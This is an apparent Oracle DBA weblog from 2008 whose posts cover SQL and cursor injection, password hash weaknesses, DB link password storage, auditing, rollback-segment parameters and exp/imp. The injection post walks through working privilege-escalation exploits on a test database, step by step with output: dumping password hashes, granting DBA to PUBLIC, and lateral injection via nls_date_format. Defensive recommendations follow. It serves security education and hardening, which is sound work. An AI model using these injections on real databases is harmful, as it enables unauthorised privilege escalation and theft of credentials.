Yaping's Weblog

September 2, 2008

SQL/Cursor injection

Filed under: Oracle — Yaping @ 2:29 am
Tags:

sys@TEST>create or replace procedure get_owner(p_obj varchar2) is
  2  type t_cur is ref cursor;
  3  v_cur   t_cur;
  4  v_owner varchar2(30);
  5  begin
  6    dbms_output.enable(1000000);
  7    open v_cur for ’select owner from all_objects where object_name = ”’||p_obj||””;
  8    loop
  9       fetch v_cur into v_owner;
 10       dbms_output.put_line(v_owner);
 11       exit when v_cur%notfound;
 12    end loop;
 13
 14    close v_cur;
 15  end;
 16  /
Procedure created.

sys@TEST>grant execute on get_owner to public;
Grant succeeded.

sys@TEST>conn test/test
Connected.

test@TEST>select username from sys.dba_users;
select username from sys.dba_users
                         *
ERROR at line 1:
ORA-00942: table or view does not exist

test@TEST >exec sys.get_owner(’T’);
PL/SQL procedure successfully completed.

test@TEST >exec sys.get_owner(’T” or ”a”=”a’);
SYS
SYS
… …
 
test@TEST>exec sys.get_owner(’T” union all select username from sys.dba_users union all select password from sys.dba_users–’);
OPS$ADMIN
TEST
CSMIG
SYS
SYSTEM
TSMSYS
CTXSYS
OUTLN
DIP
DBSNMP
FDFF0B0C32E1E432
7A0F2B316C212D67
09B4BB013FBD0D65
2A244059C05B5F54
292EB6812EBA50C2
3DF26A8B17D0F29F
71E687F036AD56E5
4A3BA55E08595C81
CE4A36B8E06CA59C
E066D214D5421CCC
E066D214D5421CCC
PL/SQL procedure successfully completed.

Now we have the users' password hash values — for example, SYS's is 09B4BB013FBD0D65 — and we can use a cracking tool to brute-force the passwords.

test@TEST>create or replace function get_dba
  2  return varchar
  3  authid current_user is
  4  pragma autonomous_transaction;
  5  begin
  6    execute immediate ‘grant dba to public’;
  7    return ‘GOT_DBA_PRIVS’;
  8  end;
  9  /
Function created.

test@TEST>
test@TEST>exec sys.get_owner(’T”||test.get_dba–’);
PL/SQL procedure successfully completed.

test@TEST>set role dba;
Role set.

Since Oracle 10g R2, it introduces one package called DBMS_ASSERT, can be used to check schema, objects, SQL valid.

test@TEST>declare
  2    v_cur number;
  3    v_res number;
  4  begin
  5    v_cur:=dbms_sql.open_cursor;
  6    dbms_sql.parse(v_cur,’select 1 from dual’,0);
  7    v_res:=dbms_sql.execute(v_cur);
  8    dbms_sql.close_cursor(v_cur);
  9  end;
 10  /
PL/SQL procedure successfully completed.

We tie the cursor to a query, the cursor like a handle to this query which is then executed using dbms_sql.execute function. An attacker can execute arbitrary SQL in an open cursor and parse the SQL and then inject the dbms_sql.execute function into the vulnerable PL/SQL object:

test@TEST>set serveroutput on
test@TEST>declare
  2    v_cur number;
  3  begin
  4    v_cur:=dbms_sql.open_cursor;
  5    dbms_sql.parse(v_cur,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to public”; commit; end;’,0);
  6    dbms_output.put_line(’cursor value is: ‘||v_cur);
  7  end;
  8  /
cursor value is: 4
PL/SQL procedure successfully completed.

test@TEST>exec sys.get_owner(’T”||chr(dbms_sql.execute(4))–’);
PL/SQL procedure successfully completed.

test@TEST>set role dba;
Role set.

Assume, rather than execute ‘GRANT DBA TO PUBLIC’, which might alert an intrusion detection/prevention system, the attacker wishes to perform an INSERT to achieve the same end, in other words, INSERT the relevant rows into the SYS.SYSAUTH$ table to make PUBLIC a DBA.

sys@TEST>create user dummy identified by dummy;
User created.
sys@TEST>grant create session to dummy;
Grant succeeded.
 sys@TEST>conn dummy/dummy
Connected.
dummy@TEST>select * from session_roles;
no rows selected
dummy@TEST>set serveroutput on
dummy@TEST>declare
  2    v_cur number;
  3  begin
  4    v_cur:=dbms_sql.open_cursor;
  5    dbms_sql.parse(v_cur,’declare pragma autonomous_transaction; begin execute immediate ”create or replace function dummy_f(p_stmt varchar2) return number authid current_user is begin execute immediate p_stmt; return 1; end;”; commit; end;’,0);
  6    dbms_output.put_line(’cursor value is: ‘||v_cur);
  7  end;
  8  /
cursor value is: 2
PL/SQL procedure successfully completed.
 
dummy@TEST>exec sys.get_owner(’T”||chr(dbms_sql.execute(2))–’);
PL/SQL procedure successfully completed.
dummy@TEST>select dummy_f(’select 1 from dual’) from dual;
DUMMY_F(’SELECT1FROMDUAL’)
————————–
                         1
dummy@TEST>exec sys.get_owner(’T”||chr(dummy.dummy_f(”declare pragma autonomous_transaction; begin execute immediate ””insert into sys.sysauth$ (grantee#,privilege#,sequence#) values (1,4,(select max(sequence#)+1 from sys.sysauth$))””; commit; end;”))–’);
BEGIN sys.get_owner(’T”||chr(dummy.dummy_f(”declare pragma autonomous_transaction; begin execute immediate ””insert into sys.sysauth$ (grantee#,privilege#,sequence#) values (1,4,(select max(sequence#)+1 from sys.sysauth$))””; commit; end;”))–’); END;
*
ERROR at line 1:
ORA-00001: unique constraint (SYS.I_SYSAUTH1) violated
ORA-06512: at line 1
ORA-06512: at “DUMMY.DUMMY_F”, line 1
ORA-06512: at “SYS.GET_OWNER”, line 7
ORA-06512: at line 1

dummy@TEST>set role dba;
Role set.

In 10g this raises a unique constraint violation, but the insert still succeeds.

Generally, DATE and NUMBER parameters in functions/procedures are considered safe ways to accept input data. Is that really so?

sys@CHEN>create or replace procedure p_date(p_date date) is
  2    stmt varchar2(200);
  3  begin
  4    stmt:=’select object_name from all_objects where created = ”’ || p_date || ””;
  5    dbms_output.put_line(stmt);
  6    execute immediate stmt;
  7  end;
  8  /
Procedure created.
 
sys@CHEN>grant execute on p_date to public;
Grant succeeded.

test@CHEN>exec sys.p_date(”’ and test.get_dba()=”GOT_DBA_PRIVS”–’);
BEGIN sys.p_date(”’ and test.get_dba()=”GOT_DBA_PRIVS”–’); END;
*
ERROR at line 1:
ORA-01858: a non-numeric character was found where a numeric was expected
ORA-06512: at line 1
test@CHEN>alter session set nls_date_format = ‘”” and test.get_dba()=”GOT_DBA_PRIVS”–”‘;
Session altered.
test@CHEN>select sysdate from dual;
SYSDATE
————————————–
‘ and test.get_dba()=’GOT_DBA_PRIVS’–
test@CHEN>exec sys.p_date(”’ and test.get_dba()=”GOT_DBA_PRIVS”–’);
select object_name from all_objects where created = ” and test.get_dba()=’GOT_DBA_PRIVS’–’
PL/SQL procedure successfully completed.

test@CHEN>set role dba;
Role set.

Now we use a procedure that takes no parameters at all, and use a cursor to attach the attack SQL.

sys@TEST>create or replace procedure p_date is
  2    stmt varchar2(200);
  3    v_date date := sysdate;
  4  begin
  5    stmt:=’select object_name from all_objects where created = ”’ || v_date || ””;
  6    dbms_output.put_line(stmt);
  7    execute immediate stmt;
  8  end;
  9  /
Procedure created.

sys@TEST>grant execute on p_date to public;
Grant succeeded.

test@TEST>set serveroutput on
test@TEST>declare
  2    v_cur number;
  3  begin
  4    v_cur := dbms_sql.open_cursor();
  5    dbms_sql.parse(v_cur,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to public”; commit; end;’,0);
  6    dbms_output.put_line(’cursor is: ‘|| v_cur);
  7  end;
  8  /
cursor is: 2
PL/SQL procedure successfully completed.

test@TEST>alter session set nls_date_format = ‘”” AND DBMS_SQL.EXECUTE(2)=1–”‘;
Session altered.

test@TEST>select sysdate from dual;
SYSDATE
—————————–
‘ AND DBMS_SQL.EXECUTE(2)=1–

test@TEST>exec sys.p_date;
select object_name from all_objects where created = ” AND DBMS_SQL.EXECUTE(2)=1–’
PL/SQL procedure successfully completed.

test@TEST>set role dba;
Role set.

Recommends
1.       If concatenation is necessary, validate the input (e.g. with DBMS_ASSERT) and reject illegal characters and keywords, such as quotes, comment markers, OR, and UNION;
2.       If possible, do not use dynamic PL/SQL;
3.       If dynamic PL/SQL is necessary then use bind variables;
4.       Use the principle of least privilege and ensure that the users created for the applications have the privileges needed and all extra privileges (such as PUBLIC ones) are not available.

Advertisements

How to check objects changed/accessed?

Filed under: Oracle — Yaping @ 2:28 am
Tags:

Sometimes we need to track objects and determine whether they have been changed.
A timestamp is not always a reliable way to identify changed objects.

@>create or replace function f_test(p_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>select CREATED,LAST_DDL_TIME from dba_objects where OBJECT_NAME=’F_TEST’;
CREATED             LAST_DDL_TIME
——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:43:38

@>select CTIME,MTIME,STIME from obj$ where NAME=’F_TEST’;
CTIME               MTIME               STIME
——————- ——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:43:38 2007-12-21 23:43:38

@>alter function f_test compile;
Function altered.

@>select CREATED,LAST_DDL_TIME from dba_objects where OBJECT_NAME=’F_TEST’;
CREATED             LAST_DDL_TIME
——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:48:19

@>select CTIME,MTIME,STIME from obj$ where NAME=’F_TEST’;
CTIME               MTIME               STIME
——————- ——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:48:19 2007-12-21 23:43:38

@>create or replace function f_test(p_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>
@>select CREATED,LAST_DDL_TIME from dba_objects where OBJECT_NAME=’F_TEST’;
CREATED             LAST_DDL_TIME
——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:49:53

@>select CTIME,MTIME,STIME from obj$ where NAME=’F_TEST’;
CTIME               MTIME               STIME
——————- ——————- ——————-
2007-12-21 23:43:38 2007-12-21 23:49:53 2007-12-21 23:49:53

DBA_OBJECTS.LAST_DDL_TIME refers to obj$.MTIME.
Even though the function's contents did not change, the timestamps still changed.

@>select dbms_utility.get_hash_value(dbms_metadata.get_ddl(’FUNCTION’,’F_TEST’,user),3,1073741824) from dual;
DBMS_UTILITY.GET_HASH_VALUE(DBMS_METADATA.GET_DDL(’FUNCTION’,’F_TEST’,USER),3,1073741824)
—————————————————————————————–
                                                                                142768459

@>create or replace function f_test(p_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>select dbms_utility.get_hash_value(dbms_metadata.get_ddl(’FUNCTION’,’F_TEST’,user),3,1073741824) from dual;
DBMS_UTILITY.GET_HASH_VALUE(DBMS_METADATA.GET_DDL(’FUNCTION’,’F_TEST’,USER),3,1073741824)
—————————————————————————————–
                                                                                142768459

@>
@>create or replace function f_test(P_str varchar2)
  2  return varchar2
  3  as
  4    v_str varchar2(32767);
  5  begin
  6    v_str:=upper(p_str);
  7    return v_str;
  8  end;
  9  /
Function created.

@>select dbms_utility.get_hash_value(dbms_metadata.get_ddl(’FUNCTION’,’F_TEST’,user),3,1073741824) from dual;
DBMS_UTILITY.GET_HASH_VALUE(DBMS_METADATA.GET_DDL(’FUNCTION’,’F_TEST’,USER),3,1073741824)
—————————————————————————————–
                                                                                629865228

If we use hash values to detect object changes, we must first store the hash value so that we have a baseline to compare against. We can also use dbms_obfuscation_toolkit to compute the hash value.

Audit is important to track objects changed or accessed. Since Oracle 10g R2, if you set audit_trail=DB_EXTENDED, triggered SQL statement be recorded in aud$.SQLTEXT, but before Oracle 10g, aud$ table doesn’t record the SQL statements, for ddl operation, you can use trigger to accomplish it (see Appendix A), for select statements, you can use fine grained auditing (DBMS_FGA).

10g
sys@TEST>@getvv audit
       NUM NAME                            ORD VALUE                ISDEFAULT
———- ——————– ————– ——————– ——————–
       938 audit_trail                       1 DB                   FALSE
           audit_trail                       2 OS                   FALSE
           audit_trail                       3 NONE                 FALSE
           audit_trail                       4 TRUE                 FALSE
           audit_trail                       5 FALSE                FALSE
           audit_trail                       6 DB_EXTENDED          FALSE
           audit_trail                       7 XML                  FALSE
           audit_trail                       8 EXTENDED             FALSE

 
Appendix A
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
– refer to Application Developer’s Guide – Fundamentals
– logon as sys

whenever sqlerror exit failure;

create table audit_trail
(USERNAME     VARCHAR2(30),
MACHINE       VARCHAR2(64),
CLIENT_IP     VARCHAR2(15),
OS_USER       VARCHAR2(30),
OWNER         VARCHAR2(30),
OBJECT_NAME   VARCHAR2(30),
OBJECT_TYPE   VARCHAR2(18),
ACTION        VARCHAR2(30),
SQL_TEXT      VARCHAR2(4000),
TIME          DATE);

create or replace trigger audit_ddl_trigger
  after ddl on database
declare
  n        number;
  stmt     varchar2(4000);
  sql_text ora_name_list_t;
begin
  n := ora_sql_txt(sql_text);
  for i in 1..n loop
      stmt := stmt || sql_text(i);
  end loop;

  insert into audit_trail(username,machine,client_ip,os_user,owner,object_name,object_type,action,sql_text,time)
  values(ora_login_user,SYS_CONTEXT(’USERENV’,’HOST’),SYS_CONTEXT(’USERENV’,’IP_ADDRESS’),
         SYS_CONTEXT(’USERENV’,’OS_USER’),ora_dict_obj_owner,ora_dict_obj_name,ora_dict_obj_type,
         ora_sysevent,stmt,sysdate);

exception
  when others then
    NULL;
end;
/

Password Cracking

Filed under: Oracle — Yaping @ 2:27 am
Tags:

There’re many tools used to crack password, such as orabf, on one P4 2.0G CPU machine, it can compute about one million hash value per second.

We can also store password and its hash value pair in files, called rainbow table, then use hash value to compare value in this file. It’s especial useful for known users, such as sys, system.

DB Link

Filed under: Oracle — Yaping @ 2:26 am
Tags:

Prior to 10g, the password for a DB link was stored in the database in clear text; this has been changed since 10g.

Oracle 9i
@>show user
USER is “TEST”
@>create database link l_test connect to test identified by test using ‘test’;
Database link created.
@>select dbms_metadata.get_ddl(’DB_LINK’,’L_TEST’,user) from dual;
DBMS_METADATA.GET_DDL(’DB_LINK’,’L_TEST’,USER)
——————————————————————————–
  CREATE DATABASE LINK “L_TEST”
   CONNECT TO “TEST” IDENTIFIED BY “TEST“
   USING ‘test’

@>conn /as sysdba
Connected.
@>select NAME,USERID,PASSWORD from link$;
NAME                           USERID                         PASSWORD
—————————— —————————— ——————————
L_TEST                         TEST                           TEST

 
10g
test@TEST>show user
USER is “TEST”
test@TEST>create database link l_chen connect to test identified by test using ‘chen’;
Database link created.
test@TEST>select DB_LINK,USERNAME from user_db_links;
DB_LINK                                            USERNAME
————————————————– ——————————
L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM             TEST
test@TEST>select dbms_metadata.get_ddl(’DB_LINK’,’L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM’,user) from dual;
DBMS_METADATA.GET_DDL(’DB_LINK’,’L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM’,USER)
——————————————————————————–
  CREATE DATABASE LINK “L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM”
   CONNECT TO “TEST” IDENTIFIED BY VALUES ‘05C9398288555E95E498B33A68083EDD2E’
   USING ‘chen’

test@TEST>conn /as sysdba
Connected.
sys@TEST>select NAME,USERID,PASSWORD,PASSWORDX from link$;
NAME                                     USERID     PASSWORD   PASSWORDX
—————————————- ———- ———- —————————————-
L_CHEN.REGRESS.RDBMS.DEV.US.ORACLE.COM   TEST                  05C9398288555E95E498B33A68083EDD2E

 
The DBLINK_ENCRYPT_LOGIN initialization parameter is used for connections between two Oracle servers (for example, when performing distributed queries).
Whenever you attempt to connect to a server using a password, Oracle encrypts the password before sending it to the server. If the connection fails and auditing is enabled, the failure is noted in the audit log. Oracle then checks the appropriate DBLINK_ENCRYPT_LOGIN. If it set to FALSE, Oracle attempts the connection again using an unencrypted version of the password. If the connection is successful, the connection replaces the previous failure in the audit log, and the connection proceeds. To prevent malicious users from forcing Oracle to re-attempt a connection with an unencrypted version of the password, you must set the appropriate values to TRUE.

Password

Filed under: Oracle — Yaping @ 2:25 am
Tags: ,

The main password encryption principles are:
1.       Enforcement of Complex Passwords
2.       Use of Salted Passwords
3.       Slow One-way Algorithm

We should consider enforcing complex passwords and a password lifetime; this policy can be defined within the system. At the same time, we should also consider adopting password management tools, such as password2000, to manage passwords conveniently.
It is much harder to crack a password if a salt is used, even if the salt itself is stored in clear text or otherwise known.
A slow one-way algorithm makes hashing deliberately slow, so more time is needed to compute the final cipher. If the algorithm can also be changed mid-way, it becomes even more difficult to crack.
Assume an attacker can compute 1 million final ciphers per second when the password is hashed in a single pass. If the calculated value is re-hashed 100 times, that drops to only 10 thousand final ciphers per second. A password that previously took one day to crack now takes 100 days; if the password lifetime is 30 days, the password will already have been changed before the old one is cracked.

Oracle Password Mechanism:
1.       Concatenate the username and the password to produce a plaintext string;
2.       Convert the plaintext string to uppercase characters;
3.       Convert the plaintext string to multi-byte storage format; ASCII characters have the high byte set to 0x00;
4.       Encrypt the plaintext string (padded with 0s if necessary to the next even block length) using the DES algorithm in cipher block chaining (CBC) mode with a fixed key value of 0x0123456789ABCDEF;
5.       Encrypt the plaintext string again with DES-CBC, but using the last block of the output of the previous step (ignoring parity bits) as the encryption key. The last block of the output is converted into a printable string to produce the password hash value.

Weak Salt Selection
Oracle password hashes use a non-conventional technique for salt selection by prepending the username to the password before calculating the hash.

Firstly, it is quite possible to obtain information about a user password based solely on its hash value and the known credentials of another user.

A second weakness is the use of non-random salt values. Although the salt used can still reduce the effectiveness of a precomputed dictionary attack against a large password hash table, an attacker could still precompute a table of possible passwords using a common username (e.g. SYSTEM), and use it to attempt to recover the password for this particular user in many different systems.

@>alter user system identified by p1;
User altered.
@>alter user sys identified by temp1;
User altered.
@>select username, password from dba_users where username like ‘SYS%’;
USERNAME                       PASSWORD
—————————— ——————————
SYS                            2E1168309B5B9B7A
SYSTEM                         2E1168309B5B9B7A

Lack of Case Preservation
Another weakness in the Oracle password hashing mechanism is the lack of alphabetic case preservation. Before the password hash is calculated, the user’s password is converted to all uppercase characters, regardless of the input case selection.
This behaviour represents a significant weakness in the password hashing algorithm, as it greatly reduces the number of possible passwords.

@>alter user system identified by P1;
User altered.
@>select username, password from dba_users where username = ‘SYSTEM’;
USERNAME                       PASSWORD
—————————— ——————————
SYSTEM                         2E1168309B5B9B7A

Recommends
1.       Force complex password & length
Force use complex password. Refer to ?/rdbms/admin/utlpwdmg.sql.
The verification routine must be a standalone function owned by SYS, but it may call sub-procedures/functions/packages internally.
Double quotation marks can be used to enclose special symbols in a password, which increases the choice of characters; however, some logon tools may have trouble with such passwords.

2.       Force password lifetime
Specify profile attribute to limit password lifetime. If this password policy has been introduced, password changed will be recorded in user_history$ table.

Since Oracle 10g R2, the default profile’s password life changed from unlimited to 10 days, if your database be upgraded from low release, use the default profile and PASSWORD_LIFE_TIME is unlimited, then you need keep an eye on it.

3.       Lock unused accounts, change default password

4.       Restrict access to password hashes & Audit

@>audit SELECT on dba_users;
Audit succeeded.

@>audit select on sys.user$;
audit select on sys.user$
                    *
ERROR at line 1:
ORA-00701: object necessary for warmstarting database cannot be altered

USER$ is a special table used during database bootstrap, so you cannot audit it.

When the password is changed through the PASSWORD command, it is encrypted before being sent over the network,
whereas an ALTER USER ... IDENTIFIED BY ... command is sent in clear text.

@>password
Changing password for TEST
Old password: ****
New password: ****
Retype new password: ****
Password changed

 
Changed in 11g

@>alter user system identified by p1;
User altered.
@>select USERNAME,PASSWORD from dba_users where USERNAME=’SYSTEM’;
USERNAME                       PASSWORD
—————————— ——————————
SYSTEM
@>select NAME,PASSWORD,SPARE4 from user$ where NAME=’SYSTEM’;
NAME                 PASSWORD                       SPARE4
——————– —————————— ——————————————————————————–
SYSTEM               2E1168309B5B9B7A               S:8388CBF57687E6E8CF97BB672C2EDE394140FADE024E16329E8A2BF2E9BF

@>alter user system identified by p1;
User altered.
@>select NAME,PASSWORD,SPARE4 from user$ where NAME=’SYSTEM’;
NAME                 PASSWORD                       SPARE4
——————– —————————— ——————————————————————————–
SYSTEM               2E1168309B5B9B7A               S:09043B9ABFA366DF41DD16DE6768FDC04C57EF1374E0B04DAC8616716074

[oracle@chen ~]$ echo -ne “p1\x74\xE0\xB0\x4D\xAC\x86\x16\x71\x60\x74″|sha1sum
09043b9abfa366df41dd16de6768fdc04c57ef13  –

sys@DMS>@getPar
Enter value for parameter: case
old   6: ksppinm like lower(’%&parameter%’)
new   6: ksppinm like lower(’%case%’)
NAME                                     VALUE                                    DESCRIPTION
—————————————- —————————————- —————————————-
_case_sensitive_logon                    TRUE                                     case sensitive logon enabled
sec_case_sensitive_logon                 TRUE                                     case sensitive password enabled for logon

sys@DMS>alter user test identified by test;
sys@DMS>conn test/test
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.

test@DMS>conn /as sysdba
Connected.
sys@DMS>show sqlcase
sqlcase UPPER
sys@DMS>conn test/TEST
Connected.
test@DMS>conn /as sysdba
Connected.
sys@DMS>set sqlcase mixed
sys@DMS>alter user test identified by Test;
sys@DMS>conn test/TEST
ERROR:
ORA-01017: invalid username/password; logon denied
Warning: You are no longer connected to ORACLE.
sys@DMS>conn test/Test
Connected.

You can see that the password hash value is no longer displayed in DBA_USERS. There are two password hashes in USER$: one is the same as before (which is still a weakness); the other is computed with SHA-1 and changes every time the password is changed, even if the new password is identical to the old one (perhaps the time is used to generate the salt?). There is also an initialization parameter that controls password case sensitivity.
The new hashing algorithm is simple: Oracle generates a 10-byte salt, concatenates the password and the salt, and computes a SHA-1 hash of the concatenated value. The result is stored in the SPARE4 column of SYS.USER$.

Oracle Security

Filed under: Oracle — Yaping @ 2:24 am
Tags:

If you can’t stop them getting in, catch them on the way out.

 

Topics

Password

DB Link

Password Cracking

Track Objects Changed/Accessed

SQL/Cursor Injection

Startup Files

Change Password with BBED

Vulnerable Packages

Network

 

Note: All test cases are done on Oracle 92040 or 92080 or 10203 or 11106 under RHEL AS 4 without CPU applied.

 

 

References

http://www.petefinnigan.com/

http://www.red-database-security.com/

http://www.databasesecurity.com/

http://www.ngssoftware.com/

http://www.toolcrypt.org/

http://www.freelists.org/

http://www.phenoelit.net/

http://www.soonerorlater.hu/

The Oracle Hacker’s Handbook: Hacking and Defending Oracle [by David Litchfield]

 

 

 

 

Rollback Segments Corruption

Filed under: Oracle — Yaping @ 2:15 am
Tags: ,

If rollback segments become corrupted, we should recover them from a backup. When there is no backup, or recovery is not necessary, we may consider using undocumented parameters to avoid accessing these rollback segments. Oracle provides _offline_rollback_segments and _corrupted_rollback_segments; before using them, we should be clear about the difference between them.

 

When opening a database, any rollback segments listed in _offline_rollback_segments or _corrupted_rollback_segments parameter:

-         Are not scanned, and any active transactions are neither marked as dead nor rolled back;

-         Appear offline in undo$;

-         Cannot be acquired by the instance for new transactions;

 

Note that even for rollback segments listed in _offline_rollback_segments, Oracle still reads the segments to find transaction status and to gather undo records for rollback. If a corrupt block is found, Oracle will still fail.

 

If an open ITL is found to be associated with a segment listed in _corrupted_rollback_segments, the segment is not read to find the transaction status:

the rollback segment is treated as though it had been dropped — the transaction is assumed to be committed, and delayed block cleanout is performed;

so if the transaction was in fact not committed, logical corruption will occur.

 

 

Session 1

test@CHEN>create table t1 as select rownum id from dual connect by level<6;

Table created.

 

test@CHEN>delete t1 where id=5;

1 row deleted.

 

test@CHEN>select * from t1;

 

        ID

———-

         1

         2

         3

         4

 

test@CHEN>@myid

Wrote file /tmp/myvar.sql

sid:11 serial:4 pid:12 spid:12961

 

Session 2

test@CHEN>insert into t1 values(6);

1 row created.

 

test@CHEN>select * from t1;

        ID

———-

         1

         2

         3

         4

         5

         6

6 rows selected.

 

test@CHEN>@myid

Wrote file /tmp/myvar.sql

sid:15 serial:17 pid:13 spid:12981

 

Session 3

sys@CHEN>@tran1

       SID    SERIAL# USERNAME                 XIDUSN    XIDSLOT     XIDSQN SEGMENT_NAME

———- ———- ——————– ———- ———- ———- ——————————

        15         17 TEST                          8          7        368 _SYSSMU8$

        11          4 TEST                          2         40        401 _SYSSMU2$

 

sys@CHEN>@getpar _offline_rollback_segments

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_offline_rollback_segments                                                        offline undo segment list

 

sys@CHEN>@getpar _corrupted_rollback_segments

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_corrupted_rollback_segments                                                      corrupted undo segment list

 

sys@CHEN>alter system set “_offline_rollback_segments”=”_SYSSMU8$” scope=spfile;

 

sys@CHEN>alter system set “_corrupted_rollback_segments”=”_SYSSMU2$” scope=spfile;

 

sys@CHEN>alter system checkpoint;

 

sys@CHEN>shutdown abort

ORACLE instance shut down.

 

sys@CHEN>startup mount

ORACLE instance started.

Total System Global Area  487658188 bytes

Fixed Size                   451276 bytes

Variable Size             369098752 bytes

Database Buffers          117440512 bytes

Redo Buffers                 667648 bytes

Database mounted.

 

sys@CHEN>alter system set events ‘10226 trace name context forever’;

 

sys@CHEN>alter database open;

 

sys@CHEN>select NAME,STATUS$ from undo$;

NAME                                        STATUS$

—————————————- ———-

SYSTEM                                            3

_SYSSMU1$                                         3

_SYSSMU2$                                         5

_SYSSMU3$                                         3

_SYSSMU4$                                         3

_SYSSMU5$                                         3

_SYSSMU6$                                         3

_SYSSMU7$                                         3

_SYSSMU8$                                         5

_SYSSMU9$                                         3

_SYSSMU10$                                        3

 

Session 4

test@CHEN>select * from t1;

        ID

———-

         1

         2

         3

         4

 

The trace file shows that Oracle uses the segments listed in _offline_rollback_segments to perform read consistent.

applied to 0x519bc014:

KTB Redo

op: 0x03  ver: 0x01

op: Z

KDO Op code: DRP row dependencies Disabled

  xtype: CR  bdba: 0x00c00013  hdba: 0x00c00011

itli: 1  ispac: 0  maxfr: 4863

tabn: 0 slot: 0(0x0)

 

August 30, 2008

exp/imp

Filed under: Oracle — Yaping @ 4:48 am
Tags: ,

-         Order of exp/imp tables

We create five tables, named d1, c2, a3, b4, e5, and created by this order.

 

SQL> conn test/test

Connected.

SQL> create table d1(id number);

Table created.

SQL> create table c2(id number);

Table created.

SQL> create table a3(id number);

Table created.

SQL> create table b4(id number);

Table created.

SQL> create table e5(id number);

Table created.

 

Then we export tables by owner mode.

 

$exp test/test file=test.dmp

Export: Release 9.2.0.4.0 – Production on Mon Jun 11 00:40:03 2007

……

. about to export TEST’s tables via Conventional Path …

. . exporting table                             A3          0 rows exported

. . exporting table                             B4          0 rows exported

. . exporting table                             C2          0 rows exported

. . exporting table                             D1          0 rows exported

. . exporting table                             E5          0 rows exported

……

 

We can see that the tables are exported in alphabetical order of table name, not in creation order or any other order.

Then we export tables by table mode.

 

$exp test/test tables=(d1,c2,b4,e5,a3) file=test.dmp

……

About to export specified tables via Conventional Path …

. . exporting table                             D1          0 rows exported

. . exporting table                             C2          0 rows exported

. . exporting table                             B4          0 rows exported

. . exporting table                             E5          0 rows exported

. . exporting table                             A3          0 rows exported

……

 

We can see that the tables are exported in the order in which they were specified.

Then we import tables by table mode.

 

$imp test/test tables=(a3,c2) file=test.dmp ignore=y

……

. importing TEST’s objects into TEST

. . importing table                           “C2”          0 rows imported

. . importing table                           “A3”          0 rows imported

……

 

We find that the import order follows the order in which tables are stored in the dump file, not the order specified on the command line. This is expected.

 

According to this result, when we archive data by exporting tables, the tables that are likely to be restored more frequently should be specified first, especially when the dump file is very large.

 

 

- Rearrange data order

When we reorganize data or transfer data between databases via the exp/imp utilities, we may need to reorder the data according to the characteristics of the application, in order to optimize performance.

For example, some queries via index range scan are very frequent, but the indexed column values on the base table are very scattered. Such queries may be inefficient, and identical or contiguous values should be arranged together.

Conversely, in some applications the accessed data are so densely packed that they cause hot-block contention, etc. In that case the data may need to be dispersed.

 

Here I introduce QUERY parameter to achieve it.

 

SQL> create table t1 as select round(dbms_random.value*10000) id,owner||’.’||object_name name,rownum seq from all_objects where rownum<1000;

 

SQL> l

  1* select * from t1 where rownum<10

SQL> /

 

        ID NAME                                                      SEQ

———- ————————————————– ———-

      5326 SYS.AGGXMLIMP                                               1

      7180 SYS.AGGXMLINPUTTYPE                                         2

      1511 SYS.ALL_ALL_TABLES                                          3

      9381 SYS.ALL_APPLY                                               4

      1090 SYS.ALL_APPLY_CONFLICT_COLUMNS                              5

       216 SYS.ALL_APPLY_DML_HANDLERS                                  6

      5032 SYS.ALL_APPLY_ERROR                                         7

      3314 SYS.ALL_APPLY_KEY_COLUMNS                                   8

      2363 SYS.ALL_APPLY_PARAMETERS                                    9

9 rows selected.

 

$exp test/test tables=(t1) query=(\”where 1=1 order by id\”) file=t1_o.dmp

 

SQL> truncate table t1;

Table truncated.

 

$imp test/test file=t1_o.dmp ignore=y

SQL> select * from t1 where rownum<10;

 

        ID NAME                                                      SEQ

———- ————————————————– ———-

        33 SYS.GV_$AW_OLAP                                           510

        48 SYS.EXU8IOVU                                              396

        79 SYS.EXU8JBQU                                              398

        84 SYS.KU$_M_VIEW_SRT_LIST_T                                 664

        88 SYS.EXU9FGA                                               460

        91 SYS.DICTIONARY                                            318

        94 SYS.AQ$_REG_INFO_LIST                                     219

       127 SYS.EXU9COOU                                              455

       128 SYS.SYSSEGOBJ                                             932

9 rows selected.

 

 

- DDL text in the dump file is visible and can be edited

In some situations, we can edit dump file to resolve special problems. Here I use one demo to explain it.

In some systems there are many user-defined types. Assume the source schema and the target schema have user-defined types with identical structure, and these types are in use. When we import data that uses these types, the import fails because the types already exist — yet we cannot drop them either.

We may be able to modify the dump file directly to resolve this problem.

 

SQL> show user

USER is “TEST”

 

SQL> create or replace type t_mytest as varray(10) of number;

  2  /

Type created.

SQL> create table t2(name varchar2(30),member t_mytest);

Table created.

SQL> insert into t2 select object_name,t_mytest(rownum,rownum+1,rownum+2) from all_objects where rownum<100;

99 rows created.

SQL> commit;

Commit complete.

SQL> select * from t2 where rownum<10;

 

NAME                           MEMBER

—————————— ————————————————–

ACCESS$                        T_MYTEST(1, 2, 3)

AGGXMLIMP                      T_MYTEST(2, 3, 4)

AGGXMLINPUTTYPE                T_MYTEST(3, 4, 5)

ALL_ALL_TABLES                 T_MYTEST(4, 5, 6)

ALL_APPLY                      T_MYTEST(5, 6, 7)

